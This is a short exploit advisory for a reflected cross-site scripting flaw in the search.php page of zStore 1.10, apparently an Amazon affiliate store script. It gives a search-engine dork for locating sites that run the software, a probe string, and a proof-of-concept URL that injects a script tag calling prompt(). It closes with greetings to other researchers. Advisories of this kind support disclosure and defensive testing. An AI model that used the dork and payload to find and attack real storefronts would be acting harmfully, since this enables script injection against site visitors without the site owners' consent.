==================================================================================================================================== | # Title : zStore 1.10 – an amazon Affiliate Store XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://de.envato.z-store.eu/ | | # Dork : © homac e.U. 2018 powered by zStore | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /search.php?p=1&srch=1'"()%26%25 [+] https://127.0.0.1/search.php?p=1&srch=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(904992)%3C/ScRiPt%3E Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================